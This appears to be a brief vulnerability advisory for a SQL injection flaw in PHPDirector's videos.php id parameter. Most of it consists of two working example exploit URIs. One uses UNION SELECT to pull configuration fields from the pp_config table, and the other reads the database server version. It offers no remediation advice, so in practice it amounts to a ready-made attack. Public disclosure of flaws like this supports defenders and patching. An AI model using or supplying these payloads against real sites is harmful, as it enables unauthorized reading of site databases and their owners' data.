PHPDirector 'videos.php' SQL Injection Vulnerability

PHPDirector 'videos.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI and exploit are available:

http://www.example.com/videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_config

http://www.example.com/path/videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--

/data/vulnerabilities/exploits/24729.txt